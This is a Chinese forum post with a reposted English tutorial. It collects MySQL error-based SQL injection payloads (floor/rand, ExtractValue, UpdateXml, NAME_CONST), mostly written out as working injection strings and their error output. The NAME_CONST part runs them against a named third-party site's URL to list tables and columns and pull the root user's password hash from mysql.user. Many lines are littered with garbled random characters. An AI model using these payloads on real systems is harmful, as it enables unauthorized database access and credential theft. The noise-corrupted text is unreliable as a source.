|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:' c. u* u% {1 V8 k0 ^' N; p; K2 F0 Y
首先进行正常查询: mysql> select * from article where id = 1;
% s" z* F2 k) r# [, k+—-+——-+———+4 n! U; H& {* c' e3 i% [
| id | title | content |
- N( c* w3 o" M" @9 L: }) k/ E+ i+—-+——-+———+
" P0 R) U% S* _5 y# @: S4 ^5 v3 ]| 1 | test | do it |) H' Q N% ^ c/ F/ ~1 R9 T R8 t
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
: Y3 {7 q" c# D9 R% \& P, O- FERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。% ]* x% f s T# h# v: ^
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);$ p/ D" K R% ^% d: A0 {& |
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
- p' w; M: X+ W5 P% ^0 H" MERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue- J* {) u$ G% n( w! t$ L) }2 g
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–4 g7 H# @4 P- b, X W2 F* f
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ( J$ z8 U# a% G7 M% Z
3 a/ u) q% e* S" f6 k8 p7 N
再收集:
# N* W! I6 X( J* V# n7 Whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) + ^3 Z( x4 T6 i: f' _7 p4 F
0 ?! q8 d) w7 j; U% x- OError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
* Q& ^- [4 ]& l4 F5 r8 w f" m$ m# z! i1 ?" }2 B$ l$ \
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
0 Z6 X, e) Z/ C4 |' k: L: q0 `
- L" K! S. R1 _: J7 G, @; x2 v) \Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
: d( p v/ R8 K# c* e% D' ?& d
( A( e, u" t/ F7 F# e& M+ S/ \MYSQL高版本报错注入技巧-利用NAME_CONST注入( i' j4 o }0 [' _% j
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 1 n' j _9 i, O+ U5 s
) A2 v$ `9 n& H( Z, I
/ Q0 j5 g0 G: r% z/ m
相关信息
/ V+ O3 E' j5 y0 R3 v2 D; J% V4 V4 c2 A& P* {
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
. ?6 {1 w$ F" @* Z3 O. l; O
% _2 [/ J: C: F! A! I" A+ sCode: {* {8 H3 x# x9 S: C9 \/ I
NAME_CONST(DATA, VALUE)
+ L* Q; H/ S* V$ W
( g- G, A& k: L* L( XReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
* G- U. a8 A4 C' g+ M
8 ?3 P4 E4 z6 b) qSELECT NAME_CONST('TEST', 1), P. E2 L( D' M
9 q5 A: N. b Y& i9 T
5 x/ q& t3 ?& y% e& H. ?
_% n+ d' D8 X5 {: c, x|---------------|
6 f; \% R$ t/ I: |2 u| TEST |
" y `' F0 D! |& S" I- `| |: m: Q! @9 D, q4 }4 J+ \
|---------------|
! A0 k% `+ V/ Z: C4 U* d5 z& y* n| 1 |
: \/ s. D. q$ {- q: }. j| |2 ^) t* \/ [- M9 _& y8 C; U* r4 @
|---------------|5 g |. ^3 \2 `' F2 R* ~9 C
) K: r5 H2 g2 L& @6 F2 ?* N5 v, { @6 Q; T _* q7 a
# k8 s4 K, U% _
, c. X% l& e( W0 _1 ~( H( h% Z# mhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
9 E' p5 M- b0 V m7 r2 oIntro to MySQL Variables
# Q, @, b: J: e/ _3 Y$ Y* R3 u4 ~# B' a1 H ~5 f$ T0 ]
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
: U6 r+ X% ?$ H8 r* l
: H1 ]' i P0 v& O% P* dCode:5 w( O6 l }% D
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2615 a- M a4 i) S/ M
0 g$ E* k! C9 \
* f% l% R1 \+ X1 U) H g/ _) r, c4 j) j# T
3 K' u" n6 y: T; ?( f
: L' ^( ^: W- y% I' Y6 _Code:
2 H$ ~# C* s/ c, W. {& rand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--4 K j5 k: @% ?5 u" ]
3 g2 D5 H: U, {) ]) H6 d
- [& u' l7 ?8 d$ r6 F1 p6 H
VAR = Your MySQL variable.' z- J3 G8 u. {! Q
. R$ v0 ^; q* ~4 C# Y% I. ^% {MySQL 5.1.3 Server System Variables1 F2 i2 j, c1 @2 c3 Y2 E. W# R
( U j( @: s' \/ b0 I3 bLet's try it out on my site..* I0 a% o) O+ ? e
7 f7 [# }- Y$ B0 g
Code:
$ Z# S, R/ z& L8 [http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
% |6 ]# U# E4 O* ]+ G! z. g4 ]$ S. ~6 t
Erroruplicate column name '5.0.27-community-nt'
& s$ T1 [( n" A6 f2 H2 ~/ u2 F
0 ^ ?7 R2 ]. Z+ F4 ?* R, N1 b; X; G+ Y Y1 g
( d G$ j c! Q: @* q, b+ [# t
- g" j3 d! ]' C& q- c T" q, O$ O `4 M6 W- f7 ~& m
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...% ]( J/ ~4 n8 s6 ^
! l) K$ i. X% @# d% F8 kData Extraction
/ |/ \% ^8 L+ v" m* j+ a7 [! i- H+ n l9 f- l0 } H1 N0 t" [( _, e
Code:0 s8 @3 J- d0 K- C
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--- A! c; D* @+ R3 c
4 O( y( a$ V7 J! Z9 {8 x1 B8 {
7 k9 g( {1 z0 E3 Z
We should get a duplicate column 1 error...# a6 Q" r( S/ [% A
: Z0 g; M2 v, Z _! j% Y; E. C% xCode:
2 t" c( W' J5 ~! {6 z- a z- q4 ihttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--; J; ]& O: V0 z+ y7 e. k9 \/ }
7 U; A1 C7 a3 x+ n# e8 J- d: d
Erroruplicate column name '13 V: R4 T2 c# h) W; Q
& p( ~+ @, }. N g; Y) e
; D: P( t Q6 b- C: |- y% {: g9 a9 `8 o& _9 h! c6 M: W
4 A9 D$ m! s$ j1 G- q& ^: o4 G! T. J- V$ u
+ ~. \" F/ C2 ZNow let's get the tables out this bitch..
& Q, s. u2 Z4 m' Y6 h: o4 b- A
- `2 [+ T5 t1 I' fCode:
0 N4 E9 _* c _- I$ a5 i+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--) I, P# N% _$ ]7 v: A1 Z- u; W
3 D Y6 M) d) t1 Y0 o
' O9 G8 G( H" y% Y* a
Let's see if it works here, if it does, we can go on and finish the job.
# P6 C! H9 Z, m9 E
8 ?7 M8 c# P' x; l) n4 `9 B6 \Code:
" p7 ~" ~- e% c6 q5 u& X* v& [http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--' ~8 R& t% Y: s% [3 N
! f3 c0 N; g1 j2 f5 i* F: s. I
' I# A' i4 d0 L& AErroruplicate column name 'com_admanage
; F0 t+ q% p7 e) n2 u
$ E& j% ]- e$ I* H' r4 J, S$ p$ h. Z5 I! Q
: z) v1 L/ Y( G. B; v
+ d! @6 D" b4 O2 f/ R; G; d- ] \( q- Y- x; Y. {
) _* u/ |5 L4 X5 e `
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.+ F4 S( Y( T2 e
. K! u# I' ^* }& [2 yLet's get the columns out of the user table..% O& a, I. h5 @6 z
: W" p1 ]- ?% e1 R! T
Code:
: T/ s6 e! D2 g: }4 U+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
! g* Y- B. E# R8 q( r4 u' A9 o- i3 u% q, O! ~+ c' E
) ?/ ~! K, f8 z* _ y& H/ @
So mine looks like this, and I get the duplicate column name 'Host'.
' [( ^- r1 Q1 Z2 X: l
7 u0 ~. G. ]* R- D- h0 iCode:
$ B9 U% n# Z( F% n; R4 ohttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--8 F$ K$ R+ a- |4 H
0 N/ n0 T$ m* Q6 |+ Q* x
Erroruplicate column name 'Host'
+ S; i3 F5 Z" Z. W) t, ~ {
/ y+ v2 j# D* z1 `6 c0 B" p" O( w. E2 z
* k6 s5 M, \5 c8 a6 @5 h
g! Y0 {+ @) z8 v$ }+ d1 h/ @
( I* H6 x' W$ q4 B- e6 t1 q% m4 q2 e S
Woot, time to finish this bitch off.- T& y# {7 e+ D" Z
3 E2 ?, L( E1 Q1 Y' GCode:# e- v6 Q, I# g# j ^
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
+ P) K7 b Y6 s. C7 o. m6 i4 Z4 F& b+ C; M. I8 J- [4 z4 X |
$ y' X, K+ N+ _1 q" d" q% mSo mine looks like this...( a$ v. k' ?% j2 E5 l" M
$ p! E- X" ?2 B1 g) |. bCode:
2 N1 V6 K9 g7 [7 f* m" Q8 ahttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
" o& u8 m' N$ b p
& S$ a8 G, s* Q. ?6 WErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
+ J% W. F/ c( u' \- a5 J2 {
, h' u8 V. E, A' J2 W5 a1 {
) F3 O% z3 x1 e# | P 8 [0 u7 g9 g* s# C8 t( u) F
3 }/ y9 `' H! o9 O% m, y
4 `/ f$ D$ |7 F: h! l; n) @+ B. o3 T: ]" A
And there we have it, thanks for reading.) L3 \, l, {- q* R
4 X8 C2 d" {: }$ A2 o2 l! Y
|
发表于 2015-11-11 19:03:37
收藏
支持
反对